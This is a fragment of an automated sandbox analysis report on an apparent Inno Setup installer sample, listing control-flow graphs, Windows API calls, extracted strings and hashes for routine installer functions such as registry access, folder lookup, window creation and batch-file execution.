                                                                              • Inno Setup: Selected Tasks, xrefs: 00468637
                                                                              • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468527
                                                                              • %s\%s_is1, xrefs: 00468545
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                              • API String ID: 47109696-1093091907
                                                                              • Opcode ID: bf4e5bcefe0dd369e5494d4ffd3574234bc3bf336502117424754692d6e87e56
                                                                              • Instruction ID: 9e5fcdcadd17e924e807c4804dd8b09e3b38f40da8ec3e6eb3bcc5aac06a0e07
                                                                              • Opcode Fuzzy Hash: bf4e5bcefe0dd369e5494d4ffd3574234bc3bf336502117424754692d6e87e56
                                                                              • Instruction Fuzzy Hash: 7751B570A002089BDB11DB65D9416DEB7F5EF49304FA086BEE840A7391EF78AE05CB5D

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2019 47b8dc-47b932 call 42c40c call 4035c0 call 47b558 call 451c38 2028 47b934-47b939 call 4529a4 2019->2028 2029 47b93e-47b94d call 451c38 2019->2029 2028->2029 2033 47b967-47b96d 2029->2033 2034 47b94f-47b955 2029->2034 2037 47b984-47b9ac call 42e2bc * 2 2033->2037 2038 47b96f-47b975 2033->2038 2035 47b977-47b97f call 403494 2034->2035 2036 47b957-47b95d 2034->2036 2035->2037 2036->2033 2041 47b95f-47b965 2036->2041 2045 47b9d3-47b9ed GetProcAddress 2037->2045 2046 47b9ae-47b9ce call 4078fc call 4529a4 2037->2046 2038->2035 2038->2037 2041->2033 2041->2035 2048 47b9ef-47b9f4 call 4529a4 2045->2048 2049 47b9f9-47ba16 call 403400 * 2 2045->2049 2046->2045 2048->2049
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(6FB90000,SHGetFolderPathA), ref: 0047B9DE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc
                                                                              • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$j]I$shell32.dll$shfolder.dll
                                                                              • API String ID: 190572456-2632518235
                                                                              • Opcode ID: 19c183ce3fa01bcadeab013b8c160553b935e57be8875c604a0db8c8468d0ef5
                                                                              • Instruction ID: 54e288ff13d65e77707e80ace3ca021a5634fe8f765e4003a0d502320fe0c017
                                                                              • Opcode Fuzzy Hash: 19c183ce3fa01bcadeab013b8c160553b935e57be8875c604a0db8c8468d0ef5
                                                                              • Instruction Fuzzy Hash: 62311DB0A00249DFCB10EB95D982AEEB7B4EF44308F50847BE554E7352D7389E458BAD

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047B723,?,?,00000000,0049A628,00000000,00000000,?,004969FD,00000000,00496BA6,?,00000000), ref: 0047B643
                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,0047B723,?,?,00000000,0049A628,00000000,00000000,?,004969FD,00000000,00496BA6,?,00000000), ref: 0047B64C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLast
                                                                              • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup$oI$oI
                                                                              • API String ID: 1375471231-857235331
                                                                              • Opcode ID: cbcd31ce72f07627676fb358a31cf6d42b3233dd890dda5219184df80f66688f
                                                                              • Instruction ID: c69cc1ab8f896661f98e1b5ecb406916ff938ef434e98a02422d0df200dcf9d8
                                                                              • Opcode Fuzzy Hash: cbcd31ce72f07627676fb358a31cf6d42b3233dd890dda5219184df80f66688f
                                                                              • Instruction Fuzzy Hash: 45415C34A002099FCB04EFA5D992ADEB7B5EF48309F50843BE51477392DB389E058B99

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2220 406334-40634e GetModuleHandleA GetProcAddress 2221 406350 2220->2221 2222 406357-406364 GetProcAddress 2220->2222 2221->2222 2223 406366 2222->2223 2224 40636d-40637a GetProcAddress 2222->2224 2223->2224 2225 406380-406381 2224->2225 2226 40637c-40637e SetProcessDEPPolicy 2224->2226 2226->2225
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                              • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                              • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModulePolicyProcess
                                                                              • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                              • API String ID: 3256987805-3653653586
                                                                              • Opcode ID: 2d072691014e9b17485d1139902ec2132fd60bbe123d67ee511500e2736c37f1
                                                                              • Instruction ID: d0a9e1fb4642b92a4408cab99680119fc9d423cfedcded744397bec81fc197df
                                                                              • Opcode Fuzzy Hash: 2d072691014e9b17485d1139902ec2132fd60bbe123d67ee511500e2736c37f1
                                                                              • Instruction Fuzzy Hash: C6E026A1380701ACEA1436F20D82F7B10488B40B64B2A14373D5AB91C3D9BDD92459BD

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2227 423884-42388e 2228 4239b7-4239bb 2227->2228 2229 423894-4238b6 call 41f3d4 GetClassInfoA 2227->2229 2232 4238e7-4238f0 GetSystemMetrics 2229->2232 2233 4238b8-4238cf RegisterClassA 2229->2233 2234 4238f2 2232->2234 2235 4238f5-4238ff GetSystemMetrics 2232->2235 2233->2232 2236 4238d1-4238e2 call 408cc4 call 40311c 2233->2236 2234->2235 2237 423901 2235->2237 2238 423904-423960 call 403738 call 406300 call 403400 call 42365c SetWindowLongA 2235->2238 2236->2232 2237->2238 2250 423962-423975 call 424188 SendMessageA 2238->2250 2251 42397a-4239a8 GetSystemMenu DeleteMenu * 2 2238->2251 2250->2251 2251->2228 2252 4239aa-4239b2 DeleteMenu 2251->2252 2252->2228
                                                                              APIs
                                                                                • Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                              • GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
                                                                              • RegisterClassA.USER32(00498630), ref: 004238C7
                                                                              • GetSystemMetrics.USER32(00000000), ref: 004238E9
                                                                              • GetSystemMetrics.USER32(00000001), ref: 004238F8
                                                                              • SetWindowLongA.USER32(00410660,000000FC,0042369C), ref: 00423954
                                                                              • SendMessageA.USER32(00410660,00000080,00000001,00000000), ref: 00423975
                                                                              • GetSystemMenu.USER32(00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
                                                                              • DeleteMenu.USER32(00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
                                                                              • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
                                                                              • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                              • String ID:
                                                                              • API String ID: 183575631-0
                                                                              • Opcode ID: 2e18e7cb37a10cc72f1a00071a2b011d07737f2aabe43150d948db026574d78a
                                                                              • Instruction ID: a1bb8b483c6051ae977dcd30bc5d6258be0549d98267ef4ab912faaf57b8e79c
                                                                              • Opcode Fuzzy Hash: 2e18e7cb37a10cc72f1a00071a2b011d07737f2aabe43150d948db026574d78a
                                                                              • Instruction Fuzzy Hash: 463184B17402006AEB10BF65DC82F6636A89B15308F10017BFA40EF2D7CABDDD40876D

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2255 42f3d4-42f3de 2256 42f3e0-42f3e3 call 402d30 2255->2256 2257 42f3e8-42f425 call 402b30 GetActiveWindow GetFocus call 41eeb4 2255->2257 2256->2257 2263 42f437-42f43f 2257->2263 2264 42f427-42f431 RegisterClassA 2257->2264 2265 42f4c6-42f4e2 SetFocus call 403400 2263->2265 2266 42f445-42f476 CreateWindowExA 2263->2266 2264->2263 2266->2265 2267 42f478-42f4bc call 42428c call 403738 CreateWindowExA 2266->2267 2267->2265 2274 42f4be-42f4c1 ShowWindow 2267->2274 2274->2265
                                                                              APIs
                                                                              • GetActiveWindow.USER32 ref: 0042F403
                                                                              • GetFocus.USER32 ref: 0042F40B
                                                                              • RegisterClassA.USER32(004987AC), ref: 0042F42C
                                                                              • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F500,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F46A
                                                                              • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F4B0
                                                                              • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F4C1
                                                                              • SetFocus.USER32(00000000,00000000,0042F4E3,?,?,?,00000001,00000000,?,00457A52,00000000,0049A628), ref: 0042F4C8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                              • String ID: TWindowDisabler-Window
                                                                              • API String ID: 3167913817-1824977358
                                                                              • Opcode ID: c7a7adc83155a0351196465afd34f02b227be391187f6a34a24c1e4424dacc7e
                                                                              • Instruction ID: a85808fe2fc477e6bfefb4b7344e4229cc17534778a3dce562db4a9d559d1a3d
                                                                              • Opcode Fuzzy Hash: c7a7adc83155a0351196465afd34f02b227be391187f6a34a24c1e4424dacc7e
                                                                              • Instruction Fuzzy Hash: 6921A371740710BAE220EF619D03F1B76A4EB14B44FA0813BF904AB2D1D7BC6D5486EE

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2275 452850-4528a1 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 2276 4528a3-4528aa 2275->2276 2277 4528ac-4528ae 2275->2277 2276->2277 2278 4528b0 2276->2278 2279 4528b2-4528e8 call 42e2bc call 42e73c call 403400 2277->2279 2278->2279
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 00452870
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 0045288A
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452890
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                              • API String ID: 1646373207-2130885113
                                                                              • Opcode ID: 5506a4263b1eff634ed0d2217251898cb45e1d8087d76cbb7271a2c362ce8048
                                                                              • Instruction ID: 1764834aba405073ceae9d3f2b1e241b80e40901185f6bd62a0f27775e5f306d
                                                                              • Opcode Fuzzy Hash: 5506a4263b1eff634ed0d2217251898cb45e1d8087d76cbb7271a2c362ce8048
                                                                              • Instruction Fuzzy Hash: DB0188B0300300EED701BBA29D03B9B3A58EB56725F50443BF80066287D7FC4909DABD
                                                                              APIs
                                                                              • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046693B
                                                                              • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466961
                                                                                • Part of subcall function 004667D8: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00466870
                                                                                • Part of subcall function 004667D8: DestroyCursor.USER32(00000000), ref: 00466886
                                                                              • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004669B8
                                                                              • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00466A19
                                                                              • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466A3F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                              • String ID: c:\directory$shell32.dll
                                                                              • API String ID: 3376378930-1375355148
                                                                              • Opcode ID: 7864bbd64ffcc0b4d3402a699463e3004b4bbc59a4beffd4c3fd38ea4829321b
                                                                              • Instruction ID: bf7570f26ded7c71d3219d2a7bb3c54f33771564a32a8265e6d4c0c3f8c9e6f1
                                                                              • Opcode Fuzzy Hash: 7864bbd64ffcc0b4d3402a699463e3004b4bbc59a4beffd4c3fd38ea4829321b
                                                                              • Instruction Fuzzy Hash: A1517070600248AFDB10DFA5CD89FDE77E9EB49344F5181B7B908AB351D638AE80CB59
                                                                              APIs
                                                                              • RegisterClipboardFormatA.USER32(commdlg_help), ref: 004307BC
                                                                              • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 004307CB
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004307E5
                                                                              • GlobalAddAtomA.KERNEL32(00000000), ref: 00430806
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                              • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                              • API String ID: 4130936913-2943970505
                                                                              • Opcode ID: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
                                                                              • Instruction ID: a6afac4a95f2c597deb8a3c09a724b63b9622156ea849986cff8ddd49ab29b56
                                                                              • Opcode Fuzzy Hash: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
                                                                              • Instruction Fuzzy Hash: 68F082705583408ED700FB2588027197BE4EB98308F044A7FB498A62E1D77E8510CB9F
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454748,00454748,?,00454748,00000000), ref: 004546D6
                                                                              • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454748,00454748,?,00454748), ref: 004546E3
                                                                                • Part of subcall function 00454498: WaitForInputIdle.USER32(?,00000032), ref: 004544C4
                                                                                • Part of subcall function 00454498: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004544E6
                                                                                • Part of subcall function 00454498: GetExitCodeProcess.KERNEL32(?,?), ref: 004544F5
                                                                                • Part of subcall function 00454498: CloseHandle.KERNEL32(?,00454522,0045451B,?,?,?,00000000,?,?,004546F7,?,?,?,00000044,00000000,00000000), ref: 00454515
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                              • String ID: .bat$.cmd$COMMAND.COM" /C $D$SuG$cmd.exe" /C "
                                                                              • API String ID: 854858120-3415487018
                                                                              • Opcode ID: 23eb109447d9d06895efbe1d143337b311b109ade6801299bf742d5fbdea7e55
                                                                              • Instruction ID: 0ceb2650e422503ffbc7ed56c7a183e4ec77644398bdd85e9c3e3b3e3b1edd4a
                                                                              • Opcode Fuzzy Hash: 23eb109447d9d06895efbe1d143337b311b109ade6801299bf742d5fbdea7e55
                                                                              • Instruction Fuzzy Hash: 17517F34A0034D6BCB01EF95C881BDDBBB9AF45309F51443BF8047B246D77C9A498759
                                                                              APIs
                                                                              • LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                              • OemToCharA.USER32(?,?), ref: 0042376C
                                                                              • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Char$FileIconLoadLowerModuleName
                                                                              • String ID: 2$MAINICON
                                                                              • API String ID: 3935243913-3181700818
                                                                              • Opcode ID: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
                                                                              • Instruction ID: 37f11e164b18fdaff452b8e89fdec3e7ced50b804c3530562fc3ce32e09f0af8
                                                                              • Opcode Fuzzy Hash: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
                                                                              • Instruction Fuzzy Hash: BF319370A042549ADF10EF2988857C67BE8AF14308F4441BAE844DB393D7BED988CB95
                                                                              APIs
                                                                              • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
                                                                              • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00418F89
                                                                              • GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA
                                                                                • Part of subcall function 004230D8: 73A1A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                • Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                • Part of subcall function 004230D8: 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                • Part of subcall function 004230D8: 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                • Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                • Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                • Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
                                                                                • Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                • Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                • Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                                • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                                • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
